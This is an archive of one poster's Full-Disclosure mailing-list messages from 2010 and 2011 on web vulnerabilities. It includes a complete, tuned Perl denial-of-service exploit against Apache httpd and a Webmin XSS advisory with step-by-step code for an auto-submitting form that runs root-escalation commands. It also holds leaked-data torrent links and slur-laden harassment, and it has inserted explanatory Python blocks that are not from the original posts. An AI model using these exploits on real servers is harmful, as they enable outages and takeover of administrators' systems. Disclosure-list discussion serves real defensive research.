Re: [Full-disclosure] one of my servers has been compromised

2011-12-05 Thread Javier Bassi
In addition to the tips given (chroot, disable shell_exec, etc.), you
should also use open_basedir with DocumentRoot as path on each
VirtualHost. In case of a compromise via webapp, this will reduce the
compromised zone in the filesystem to the DocumentRoot of one
VirtualHost instead of the whole chroot jail.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] CodeV discovers 31 vulnerabilities on 5 OS softwares

2011-11-23 Thread Javier Bassi
On Wed, Nov 23, 2011 at 8:11 AM, Press - Dognædis pr...@dognaedis.com wrote:
 Dear FullDisclosure,

 CodeV is a static code analysis tool (currently for php only, but soon
 to be developed to other languages) developed by Dognaedis
  to offer a tool to integrate in the
 development of the life cycle of software in order to detect
 vulnerabilities that arise from bad input validations as soon as they
 hit the code. The tool has a public demo version that is limited to a
 script with 250 lines of code and is available at


 We analyzed some Open Source software to test our own tool and
 discovered 31 new vulnerabilities in 5 different open source software packages.
 Following responsible disclosures of discovered vulnerabilities
 throughout CodeV's Open Source Software analysis, we are here reporting
 all the vulnerabilities discovered as soon as possible to the community,
 offering security not only to our clients but to the entire public. All
 the vulnerabilities brought to public previously followed the necessary
 disclosure protocol to the responsible teams. The vulnerabilities
 discovered can be found in

 Thank you for your time and we hope you enjoy CodeV.

I liked the disclaimer in submit-ok.html

DISCLAIMER: Lorem ipsum dolor sit amet, consectetur adipisicing elit,
sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut
enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi
ut aliquip ex ea commodo consequat. Duis aute irure dolor in
reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla
pariatur. Excepteur sint occaecat cupidatat non proident, sunt in
culpa qui officia deserunt mollit anim id est laborum. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Some hash values

2011-10-09 Thread Javier Bassi
On Sun, Oct 9, 2011 at 2:44 PM, Michal Zalewski lcam...@coredump.cx wrote:
 I believe that this is the best place to post the following hash values:
 MD5Sum:a762a3b9cbfb3d63034646087680b254
 SHA1sum:6f25d72bd693b52de25c36d04f9e17f945420580
 SHA256sum:d5886dd14f3eac029d771da6bcc6d49bc2e50c79159e5390c9c0776c725243a5

 No, for these specific hash values, I believe the appropriate place to
 post them would be deviantArt.

Use subject 'noise' when posting the hashes of your 0day-exploit you
are trying to sell.
Like this dude
http://seclists.org/fulldisclosure/2011/Jul/21

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Apache Killer

2011-09-13 Thread Javier Bassi
On Mon, Sep 12, 2011 at 11:26 PM, xD 0x41 wrote:
 I know this topic is OLD but, I just wonder and, also having spoken to kcope
 re this myself, discussed the size of each bucket which can be made to
 stupendous amounts and using a different vector, ok, instead of Range:bytes=
 , picture a GET request with as was shown in the code is there, you
 Request-Range: bytes=5-,5-69,5- , now we have bypassed most filters
 already in place, and the request range code, is exactly the same as range
 code.
 Only one person spotted this.

HTTPD advisory was very clear that both Range and Request-Range can be
used. Everyone who unset Range probably unset Request-Range too. If the
host is vulnerable it's a little better to use Range because using
Request-Range will take 8 bytes more. (more bytes = less ranges)

I have tested the exploit a bit and saw 1300 ranges is just a fixed
number chosen by kingcope but it can be a little bigger. The Range field
can be almost 8KB long and it's a total waste of bytes to use the x-y,
format where y is an increasing number that will take more than one
digit. So instead of 1300 you can get it to 2725 max if you repeat
x-, where x is always a single-digit number. By doing that the exploit
gets much more effective.

I have attached the source if anyone cares
#Apache httpd Remote Denial of Service (memory exhaustion)
#Exploit by Kingcope. Concept by Michal Zalewski
#Some modifications by Javier Bassi.
#original code: http://seclists.org/fulldisclosure/2011/Aug/175
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
	print "Apache Remote Denial of Service (memory exhaustion)\n";
	print "by Kingcope.\n";
	print "usage: perl killapache.pl <host> [numforks] <page>\n";
	print "example: perl killapache.pl www.example.com 50 index.php\n";
}

# Build the Range value once: 2725 ranges of the form ",N-" with N cycling
# through a single digit, so each range costs 3 bytes and the whole header
# line stays just under Apache's default 8190-byte LimitRequestFieldSize.
$w = "";
$num = 0;
for ($k = 0; $k < 2725; $k++) {
	$w .= ",$num-";
	$num++;
	if ($num == 10) {
		$num = 0;
	}
}

sub killapache {
	use vars qw($w);
	print "ATTACKING $ARGV[0] [using $numforks forks]\n";

	$pm = new Parallel::ForkManager($numforks);

	for ($k = 0; $k < $numforks; $k++) {
		my $pid = $pm->start and next;   # child continues below, parent forks the next one

		$x = "";
		my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
		                                 PeerPort => 80,
		                                 Proto    => 'tcp');

		# kingcope's HEAD request with the oversized Range header, $path
		# replacing the fixed "/" of the original.
		$p = "HEAD $path HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$w\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
		print $sock $p;

		# Hold the connection open until the server closes it.
		while (<$sock>) {
		}
		$pm->finish;
	}
	$pm->wait_all_children;
}

# Send one trivial range; a "206 Partial Content" status line means the
# server honours Range on this host.
sub testapache {
	my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
	                                 PeerPort => 80,
	                                 Proto    => 'tcp');

	$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
	print $sock $p;

	$x = <$sock>;
	if ($x =~ /Partial/) {
		print "host seems vuln\n";
		return 1;
	} else {
		return 0;
	}
}

if ($#ARGV < 0) {
	usage;
	exit;
}

if ($#ARGV >= 1) {
	$numforks = $ARGV[1];
} else {
	$numforks = 50;
}

$path = ($#ARGV > 1) ? '/' . $ARGV[2] : '/';

$v = testapache();
if ($v == 0) {
	print "Host does not seem vulnerable\n";
	exit;
}
while (1) {
	killapache();
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
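Added example, not part of the original post and not kingcope's or Javier Bassi's code: a Python script that builds the Range header the way the modified killapache.pl above does, works out how many ranges fit under Apache's default 8190-byte LimitRequestFieldSize for Range versus Request-Range (the "8 bytes more" point in the reply), and, on the defender's side, counts the ranges in a raw request so a header carrying more than a handful can be dropped, which is the logic behind the SetEnvIf workaround in the httpd advisory. The host name, path, sample requests and the five-range threshold are constructed or assumed for the example.

```python
"""Range-header arithmetic for the Apache byterange DoS discussed above.

Added example; not kingcope's or Javier Bassi's code. Builds the header the
way the modified killapache.pl does, computes how many ranges fit under
Apache's default LimitRequestFieldSize for Range vs Request-Range, and
counts ranges in a raw request the way a drop-the-header mitigation would.
"""
import re

# Apache's default LimitRequestFieldSize: the whole "Name: value" line must fit.
APACHE_FIELD_LIMIT = 8190
# Both header names are handled by the same byterange code in httpd.
RANGE_HEADERS = ("range", "request-range")
# Assumed policy for the check below: more ranges than this and the header is dropped.
MAX_RANGES_ALLOWED = 5


def build_range_value(extra_ranges: int) -> str:
    """Mirror of the exploit loop: 'bytes=0-' then extra_ranges copies of ',N-'
    with N cycling 0..9, so every added range costs exactly 3 bytes."""
    return "bytes=0-" + "".join(f",{i % 10}-" for i in range(extra_ranges))


def header_line(name: str, value: str) -> str:
    """killapache.pl writes 'Range:bytes=...' with no space after the colon."""
    return f"{name}:{value}"


def max_extra_ranges(name: str, limit: int = APACHE_FIELD_LIMIT) -> int:
    """Largest extra_ranges for which header_line(name, ...) still fits in limit."""
    base = len(header_line(name, build_range_value(0)))
    per_range = len(build_range_value(1)) - len(build_range_value(0))
    n = (limit - base) // per_range
    assert len(header_line(name, build_range_value(n))) <= limit
    assert len(header_line(name, build_range_value(n + 1))) > limit
    return n


def build_request(host: str, path: str = "/", header: str = "Range",
                  extra_ranges: int = 2725) -> bytes:
    """The HEAD request the exploit sends, as raw bytes (host/path are placeholders)."""
    return (f"HEAD {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"{header_line(header, build_range_value(extra_ranges))}\r\n"
            "Accept-Encoding: gzip\r\nConnection: close\r\n\r\n").encode("ascii")


def count_ranges(value: str) -> int:
    """Number of range-specs in a 'bytes=a-b,c-d,...' value; 0 if not a byte range."""
    m = re.fullmatch(r"\s*bytes\s*=\s*(.*)", value, re.IGNORECASE | re.DOTALL)
    if not m:
        return 0
    return sum(1 for spec in m.group(1).split(",") if spec.strip())


def scan_request(raw: bytes, max_allowed: int = MAX_RANGES_ALLOWED) -> list:
    """Return [(header_name, range_count)] for every Range/Request-Range header
    in one raw HTTP request head that carries more than max_allowed ranges."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    findings = []
    for line in head.split("\r\n")[1:]:        # skip the request line
        if ":" not in line:
            continue
        name, value = (part.strip() for part in line.split(":", 1))
        if name.lower() in RANGE_HEADERS:
            n = count_ranges(value)
            if n > max_allowed:
                findings.append((name, n))
    return findings


if __name__ == "__main__":
    # Constructed sample traffic: the exploit's request and an ordinary resumed download.
    evil = build_request("www.example.com", "/index.php")
    benign = (b"GET /big.iso HTTP/1.1\r\nHost: www.example.com\r\n"
              b"Range: bytes=1000-\r\n\r\n")
    print("Range header fits", max_extra_ranges("Range"), "extra ranges")
    print("Request-Range header fits", max_extra_ranges("Request-Range"), "extra ranges")
    print("exploit request:", scan_request(evil))
    print("resumed download:", scan_request(benign))
```

The arithmetic reproduces the 2725 figure from the reply (14 bytes of "Range:bytes=0-" plus 3 bytes per range under 8190) and gives 2722 for Request-Range, three fewer because the name is 8 bytes longer. A resumed download with one or two ranges passes the check untouched; the exploit's request trips it on both header names, so a filter that only looks at Range misses half the attack surface.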

Re: [Full-disclosure] [webmin-devel] XSS in Webmin 1.540 + exploit for privilege escalation

2011-05-21 Thread Javier Bassi
 In what Webmin release will this be fixed? Do you have a CVE identifier for
 this yet?

The new version (Webmin 1.550) fixes this vulnerability. I don't have a
CVE id; I tried to contact the cve.mitre.org guys with no luck. I have
Bugtraq ID (BID) 47558.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Facebook

2011-05-03 Thread Javier Bassi
On Tue, May 3, 2011 at 7:51 PM, Daniel Clemens
daniel.clem...@packetninjas.net wrote:
 Prove it!
 You clearly know nothing about our legal system.

You might find these links interesting
http://www.youtube.com/watch?v=t0aQojDGSD4
http://www.google.com/transparencyreport/governmentrequests/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] XSS in Webmin 1.540 + exploit for privilege escalation

2011-04-23 Thread Javier Bassi
Information

Name :  XSS vulnerability in Webmin
Software :  All versions prior to and including 1.540 are affected.
Vendor Homepage :  http://www.webmin.com
Vulnerability Type :  Cross-Site Scripting
Severity :  Medium
Researcher :  Javier Bassi javierbassi [at] gmail [dot] com


Description
--
Webmin is a web-based interface for system administration for Unix.
Using any modern web browser, you can setup user accounts, Apache,
DNS, file sharing and much more.
https://secure.wikimedia.org/wikipedia/en/wiki/Webmin


Details
---
Webmin is affected by an XSS vulnerability in all versions prior to and
including 1.540.
Webmin fails to sanitize $real in useradmin/index.cgi. $real is the
Full Name in the finger information of the user. useradmin/index.cgi
is the control panel of the Users & Groups section in Webmin.
An attacker who has a normal user account on the victim's machine could
change his Full Name with the chfn command, inject XSS and execute
commands as root.


Timeline:
---
2011.04.24 - announced at my site/informed developers/disclosed at my site.


Solution:
---
wait for updates.


Developing an exploit:
---
With Webmin you can execute shell commands and the only security
measure Webmin has is checking the Referer in the HTTP headers. So we
can't use an iframe, but we can bypass this protection by injecting
code that executes a JavaScript file that prints a form that
autosubmits itself to Webmin's shell.cgi and executes multiple
commands in the format command1;command2;...;commandn
So XSS-->.js-->form-->autosubmit-->shell.cgi

The injected code will be displayed inside a form, so we need to close
the original form first with </form>.
The shell/index.cgi form is the following:

</form><form class='ui_form' style="visibility:hidden"
action='https://zion:1/shell/index.cgi' method=post
enctype=multipart/form-data >
<input class='ui_submit' type=submit value="Execute command:">
<input class='ui_textbox' type=hidden name="cmd" value="" size=50
style='width:100%'></td>
<input class='ui_submit' type=submit name="clear" value="Clear history">
<input class='ui_hidden' type=hidden name="pwd" value="/root">
<input class='ui_hidden' type=hidden name="history" value="">
<input class='ui_hidden' type=hidden name="previous" value="find /usr
-name sftp-server">
<input class='ui_hidden' type=hidden name="previous" value="echo
/usr/lib/sftp-server >> /etc/shells">
<input class='ui_hidden' type=hidden name="previous" value="cat /etc/shells">
<input class='ui_hidden' type=hidden name="previous" value="find
/usr/lib -name sftp-server">
<input class='ui_hidden' type=hidden name="previous" value="echo
/usr/lib/openssh/sftp-server >> /etc/shells">
<input class='ui_submit' type=submit name="doprev" value="Execute
previous command">
<select class='ui_select' name="pcmd"><option value="echo
/usr/lib/openssh/sftp-server >> /etc/shells">echo
/usr/lib/openssh/sftp-server >> /etc/shells
<option value="find /usr/lib -name sftp-server">find /usr/lib -name sftp-server
<option value="cat /etc/shells">cat /etc/shells
<option value="echo /usr/lib/sftp-server >> /etc/shells">echo
/usr/lib/sftp-server >> /etc/shells
<option value="find /usr -name sftp-server">find /usr -name sftp-server
</select><input type=button name="movecmd" value='Edit previous'
onClick='cmd.value = pcmd.options[pcmd.selectedIndex].value'>
<input class='ui_submit' type=submit name="clearcmds" value="Clear commands">
</form>

We use JavaScript to autosubmit it. We add id="lala" in the form tag and
also we add the following script at the end of the code:
<script>document.getElementById('lala').submit();</script>

Commands go in the 'cmd' input. A nice combination of commands could be:
chfn -f "safename" neo;usermod -G root neo;usermod -g root neo;killall
-9 firefox-bin
So when the admin browses Users & Groups this will change the Full
Name of our user 'neo' back to a safe one, make us root and kill
Firefox. The admin will think Firefox crashed and when he goes back to
Users and Groups in Webmin it will not crash again because we already
changed our full name.
To include commands in value="" they must be HTML escaped: (
http://www.htmlescape.net/htmlescape_tool.html )
chfn -f &quot;safename&quot; neo;usermod -G root neo;usermod -g root
neo;killall -9 firefox-bin

Now we need a .js file that prints the form + the autosubmit code.
(thx to 
http://accessify.com/tools-and-wizards/developer-tools/html-javascript-convertor/
)
It will look like this

document.write("<\/form><form class='ui_form'
style=\"visibility:hidden\" id=\"lala\"
action='https:\/\/zion:1\/shell\/index.cgi' method=post
enctype=multipart\/form-data >");
document.write("<input class='ui_submit' type=submit value=\"Execute
command:\">");
document.write("<input class='ui_textbox'type=hidden name=\"cmd\"
value=\"chfn -f &quot;safename&quot; neo;usermod -G root neo;usermod
-g root neo;killall -9 firefox-bin\" size=50
style='width:100%'><\/td>");
document.write("<input class='ui_submit' type=submit name=\"clear\"
value=\"Clear history\">");
document.write("<input class='ui_hidden' type=hidden
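Added example, not Webmin's code and not part of the advisory above: a Python sketch of the failing pattern, a GECOS Full Name interpolated straight into the Users & Groups table, beside the escaped version, plus the attribute-escaping step the advisory does by hand with &quot;. The row template, the cgi names and the payload are constructed for the example and are not taken from Webmin's source.

```python
"""Unescaped vs escaped rendering of the GECOS Full Name field.

Added example, not Webmin's code. ROW_TEMPLATE stands in for the row that
useradmin/index.cgi prints per user; the payload is of the shape the
advisory describes (close the page's form, inject an auto-submitting one).
"""
import html
import re

# Hypothetical stand-in for the per-user row; the real page wraps these rows in a <form>.
ROW_TEMPLATE = ('<tr><td><a href="edit_user.cgi?user={user}">{user}</a></td>'
                '<td>{real}</td></tr>')

# Constructed payload: what an attacker would put in the Full Name field.
PAYLOAD = ('</form><form id="lala" action="/shell/index.cgi" method="post">'
           '<input type="hidden" name="cmd" value="id"></form>'
           '<script>document.getElementById("lala").submit();</script>')


def render_row_unsafe(user: str, real: str) -> str:
    """Interpolates the GECOS field verbatim: attacker markup becomes part of the page."""
    return ROW_TEMPLATE.format(user=user, real=real)


def render_row_safe(user: str, real: str) -> str:
    """Escapes &, <, >, " and ' so the field is inert in text and attribute context."""
    return ROW_TEMPLATE.format(user=html.escape(user, quote=True),
                               real=html.escape(real, quote=True))


def tags_in(markup: str) -> list:
    """Lower-cased names of every tag opened or closed in the rendered markup."""
    return [t.lower() for t in re.findall(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)", markup)]


def attr_value(cmd: str) -> str:
    """A shell command destined for value=\"...\": the embedded double quotes
    must become &quot; or the attribute ends early and the form breaks."""
    return html.escape(cmd, quote=True)


if __name__ == "__main__":
    print("unsafe tags:", tags_in(render_row_unsafe("neo", PAYLOAD)))
    print("safe tags:  ", tags_in(render_row_safe("neo", PAYLOAD)))
    print("attribute:  ", attr_value('chfn -f "safename" neo;usermod -G root neo'))
```

The escaped row renders exactly the eight tags the template contains no matter what the user put in chfn, while the unescaped one grows a form and a script. html.escape with quote=True covers both the text node the name lands in and the attribute case the advisory escapes manually.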

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-13 Thread Javier Bassi
On Tue, Apr 12, 2011 at 6:11 PM, Cal Leeming wrote:
 Actually, the filtering seems to be based on the accuracy of the first hit
 set.
 http://www.google.com/search?q=hacker&btnI - win
 http://www.google.com/search?q=hello+hacker&btnI - fail
 http://www.google.com/search?q=hello+hack&btnI - win
 http://www.google.com/search?q=hello+hac&btnI - fail
 http://www.google.com/search?q=hello&btnI - win
 See what I mean?

satyam was right. It also depends on geographical locations. I got
redirected with all those links.
I'm feeling lucky (?)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Facebook URL redirection issue

2011-04-03 Thread Javier Bassi
 Reported this issue to Facebook team on 03/22/11 and Facebook team 
 acknowledged this issue on 03/29/11 and fixed this vulnerability.

They still have redirects on apps made by their users, and they don't care
http://apps.facebook.com/truthsaboutu/track.php?r=http://www.google.com
and if someone falls for basic phishing with the facebook domain, he will
fall for the apps.facebook subdomain too.

Btw, linkedin has an open redirect too and they couldn't care less about it
http://www.linkedin.com/redirect?url=www.google.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Facebook URL Redirect Vulnerability

2011-03-03 Thread Javier Bassi
On Thu, Mar 3, 2011 at 4:04 PM, Chris Evans scarybea...@gmail.com wrote:
 You do not need an open redirect to trick the user. Try a
 <a href=http://www.evil.com;>www.facebook.com/OMFGacatvomitingacanaryandpuppiesandshit</a>

You are all suggesting scenarios that only a non-tech person would
fall for. Everybody knows that JavaScript can change the status text when
mousing over a link. This is what Google does in the search results.
(Although you can disable this in Firefox in Advanced JavaScript
Settings)

Also with Nathan's scenario. Even if Facebook only displays
'apps.facebook.com' when posting the link, if the person clicks there
it means he is already on Facebook. If he is already logged in
Facebook, clicking on a link going to a login page is way too obvious.

A good scenario would be via Instant Message. There is no HTML or
JavaScript and when the victim clicks a link he knows he's going to
that link, and there is a big chance he will not notice it is a
redirect.  From http://apps.facebook.com/stuff to
http://apps.facebook.evil.com/stuff  can do the trick.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] HBGary Mirrors?

2011-02-19 Thread Javier Bassi
On Fri, Feb 18, 2011 at 1:24 PM, ck c.kernst...@googlemail.com wrote:
 So, the FEDs shut down all mirrors of the HBGary files - or didn't they?

Just in case anyone wants to host a mirror, they are seeding a full
backup of the anonleaks website (6.7GB)
Here is the .torrent
http://www.2shared.com/file/ZkCwq_ZZ/hbgaryanonleaksrutargz.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] An enemy of the infosec community needs to be brought to justice

2011-02-11 Thread Javier Bassi
On Fri, Feb 11, 2011 at 5:30 PM, Leon Kaiser litera...@gmail.com wrote:
 The pastebin link seems to be down, would you/a third party be so kind as to 
 mirror it?

http://www.2shared.com/file/4z209Olp/lgtt7z.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Want to remove Encyclopedia Dramatica article? Think again. Sherrod DeGrippo, Andrew Auernheimer's cyberbully paradise.

2011-01-07 Thread Javier Bassi
About deleting ED article:
http://gawker.com/5709789/noose-closes-around-pro+wikileaks-vigilantes

On Fri, Jan 7, 2011 at 4:46 AM, Cal Leeming [Simplicity Media Ltd]
cal.leem...@simplicitymedialtd.co.uk wrote:
 This has to be said.
 Nicholarse Castor sounds like a complete and utter faggot.
 On Fri, Jan 7, 2011 at 7:34 AM, Victor Rigo victor_r...@yahoo.com wrote:

 Post:
 http://crimint.wordpress.com/2011/01/07/why-encyclopedia-dramatica-is-so-insidious/

 It’s a graffiti wall.

 The first level of wrong is the action. The action that is mean-spirited
 toward an individual. Everyone has done something mean or retaliatory
 before, others have done embarrassing things.

 Maybe you trolled someone. Maybe you posted pictures of yourself online.
 This in itself is bad, however, in time-space, unless a serious tragedy is
 committed, life goes on. You can forget.

 Encyclopedia Dramatica perpetuates a horrendous act to the annals of
 history for the perverse enjoyment of anonymous cowards. It sounds like the
 detective’s best tool. Think about it, it’s open source intelligence. :D

 The difficulty is tragic. The protections for free speech in the United
 States are so wrong and laws in states are very new. I have not seen any
 criminal cases based off harassment

 When graffiti is on the wall, we could normally call up the city to clean
 it off. ED makes this troublesome if not impossible.

 * Encyclopedia Dramatica is an entity owned by Sherrod DeGrippo. To set
 the tone her capacity for empathy, she links to a republished list of
 pedophilia books [1] on her home page GirlVinyl.com.
 * Encyclopedia Dramatica also has access to attack dog weev (aka Andrew
 Auernheimer). He is belligerent to any thought of removal of posts, unless
 you’re willing to strip naked and masturbate [2].
 * Encyclopedia Dramatica is run by a hivemind of trolls who are miserable.
 They are feeding off each other for lulz, which psychotically is the
 enjoyment of pain of another.
 * Streisand Effect Zone. Attempts to censor an article, no matter how
 lurid (If you must, Nikki Catsouras) will spread the material even further.

 What we have here is the criminal mind. Not a jolted crime spree, not a
 series of youthful indiscretions. What we have is a twisted, knowing
 facilitator, a kingpin, a dark witch.

 DeGrippo doesn’t sound like someone who is miserable. Rather, she sounds
 feminine. Like someone your aunt would do her nails with. Her hobbies
 include interior decorating, baking, and hosting a site which gives people
 nightmares at night.

 That’s why I made the post Sherrod DeGrippo’s Nightmare Machine. [3]

  End Notes
 
 [1] DeGrippo, Sherrod. List of Pedophilia and Incest books.  2011-01-07.
 URL: http://girlvinyl.com/lj2007/LJbannedbooks/index.html. Accessed:
 2011-01-07. (Archived by WebCite® at http://www.webcitation.org/5vYEuWoeP)
 [2] Castor, Nicholas. Want to have your article removed from Encyclopedia
 Dramatica? 2011-01-07.
 URL:http://crimint.wordpress.com/2011/01/07/want-to-have-your-article-removed-from-encyclopedia-dramatica/.
 Accessed: 2011-01-07. (Archived by WebCite® at
 http://www.webcitation.org/5vYMbt4xq)
 [3] http://seclists.org/fulldisclosure/2010/Dec/52

  Further Archives
 
 DeGrippo, Sherrod. GirlVinyl.com Homepage. 2011-01-07.
 URL:http://girlvinyl.com. Accessed: 2011-01-07. (Archived by WebCite® at
 http://www.webcitation.org/5vYFFUDpV)

  Reporting
 
 FBI. http://tips.fbi.gov
 CrimINT tipline. http://crimint.wordpress.com/send-tips/ (any cybercrime
 tips welcomed)

 Victor Rigo, CISSP
 Independent Computer Security Consultant
 Buenos Aires, AR
 +5411-4316-1901







___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] adobe.com important subdomain SQL injection again!

2010-12-19 Thread Javier Bassi
Yet Flashblock has 10 million downloads

On Sat, Dec 18, 2010 at 8:30 PM, Victor Rigo victor_r...@yahoo.com wrote:

 Let's see, flash is:

 - Cross-platform
 - Cross-architecture
 - Has its own programming language
 - Is embedded on websites
 - Access to javascript to popup, local caches, etc.

 It's not ineptness, it's what you get when you write software that can
 actually do stuff.

 If Java applets were still the hip thing, you'd see the same thing about
 that.

 Victor Rigo, CISSP
 Computer Security Consultant
 +5411-4316-1900
 Buenos Aires, Argentina

 --- On Sat, 12/18/10, Jeffrey Walton noloa...@gmail.com wrote:


 From: Jeffrey Walton noloa...@gmail.com
 Subject: Re: [Full-disclosure] adobe.com important subdomain SQL injection
 again!
 To: Maciej Gojny v...@ariko-security.com
 Cc: full-disclosure@lists.grok.org.uk
 Date: Saturday, December 18, 2010, 5:53 PM


 On Sat, Dec 18, 2010 at 11:58 AM, Maciej Gojny v...@ariko-security.com
 wrote:
  hello full disclosure!
 
  After six months from the first contact with Adobe security team,
  important
  adobe.com subdomain is still vulnerable to SQL injection attacks. We
 hope
  that this time, serious people will try to solve the problem.
 There's a reason Adobe is the most attacked software [1,2], and its
 probably because they write the most vulnerable software (or
 adversaries are looking for a challenge, which seems less intuitive
 and highly unlikely to me).

 It appears insecurity is an enterprise wide practice, and not just
 limited to their software.

 Jeff

 [1] Adobe surpasses Microsoft as favorite hacker’s target (Jul 2009)
 http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/

 [2] Adobe predicted as top 2010 hacker target (Dec 2009)
 http://www.theregister.co.uk/2009/12/29/security_predictions_2010/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Facebook name + photo extraction using 'Forgot Password' page

2010-08-12 Thread Javier Bassi
Did you report this? Apparently reset.php has been fixed.
http://img440.imageshack.us/img440/3637/screenshotjm.png

On Thu, Aug 12, 2010 at 5:06 AM, Rishabh Singla
rishabhsin...@rishabhsingla.com wrote:

 Hi everyone,

 This is with reference to the post by Mr. Atul Agarwal dated 11-Aug-10, and 
 posted here (http://seclists.org/fulldisclosure/2010/Aug/130), in which 
 Mr. Atul describes how a spammer might enter email addresses and extract the 
 names (and photos) from Facebook accounts registered against those email IDs. 
 Mr. Atul also mentions that this technique can be used to validate email 
 addresses in one's possession.

 Would like to point out that another way to harness this information is 
 through Facebook's Forgot your password? page (located at 
 http://www.facebook.com/reset.php). By entering an email address on this 
 webpage, a user's name, a photo and possibly a snippet of text is displayed 
 (assuming a Facebook user exists against this email ID).

 I came across this on 6-Jun-10, and posted the same on my blog on 7-Jun-10. 
 You might want to read the details on my blog 
 (http://blog.rishabhsingla.com/2010/06/facebooks-reset-password-page-has.html).

 Rishabh Singla
 http://blog.rishabhsingla.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Facebook name extraction based on email/wrong password + POC

2010-08-11 Thread Javier Bassi
Uploading an address book will check the privacy settings of each contact
and it will not display contacts that have chosen not to appear in Facebook
search results.
It's the same as searching for the email directly in the search box:
http://www.facebook.com/search/?q=...@something.com

As said by Atul, when the email is valid and the password is not, it does not check
the privacy settings and displays profile pic+name, so this is a bug.

On Wed, Aug 11, 2010 at 11:20 AM, Atul Agarwal a...@secfence.com wrote:

 Never encountered that, nevertheless excellent find!

 Would check it and would incorporate that in the script!

 Thanks,
 Atul Agarwal
 Secfence Technologies
 www.secfence.com



 On Wed, Aug 11, 2010 at 7:41 PM, Kevin Connolly bugt...@gmail.com wrote:

 It gets better. If you enter an e-mail address that is close but not
 exactly right then Facebook will correct it for you

 
 Fixed Misspelling

 It looks like you entered a slight misspelling of your email or username.
 Please re-enter your password. 


 and it displays the corrected e-mail address in the login box :-)



 On Wed, Aug 11, 2010 at 10:01 AM, Atul Agarwal a...@secfence.com wrote:

  Hello all,

 Sometime back, I noticed a strange problem with Facebook, I had
 accidentally entered wrong password in Facebook, and it showed my first and
 last name with profile picture, along with the password incorrect message. I
 thought that the fact that it was showing the name had something to do with
 cookies stored, so I tried other email id's, and it was the same. I wondered
 over the possibilities, and wrote a POC tool to test it.

 This script extracts the First and Last Name (provided by the users when
 they sign up for Facebook). Facebook is kind enough to return the name even
 if the supplied email/password combination is wrong. Furthermore, it also
 gives out the profile picture (this script does not harvest it, but its easy
 to add that too). Facebook users have no control over this, as this works
 even when you have set all privacy settings properly. Harvesting this data
 is very easy, as it can be easily bypassed by using a bunch of proxies.

 As Facebook is so popular, some implications -

 1) Someone has a list of email addresses that he has no clue about. He can
 feed them to Facebook one by one (or in a list, using a script like this)
 and chances are that he'll get more than 50% hits. Useful for phishing
 attacks (People will get more convinced when they see their *real* names).

 2) One can generate random email addresses, and *verify* their existence.
 Hint: You can generate emails using (common names + a corporate domain),
 and check them against Facebook. Might come handy in a Pentest.

 Rest is only left up to one's imagination.

 Find the POC script attached.

 PS: I did not report this, as I am unsure on what to call it, a bug,
 vuln or a feature.

 Thanks,
 Atul Agarwal
 Secfence Technologies
 www.secfence.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] reCAPTCHA Broken

2010-08-04 Thread Javier Bassi
It doesn't work. -_-

Sometimes you can type the two words wrong and it takes them as valid.
If the words have typos, like for example typing jold instead
of hold. Probably reCAPTCHA knows it's a typo and corrects it.

On Tue, Aug 3, 2010 at 2:44 AM, awf awf lol-wut-h...@live.com wrote:

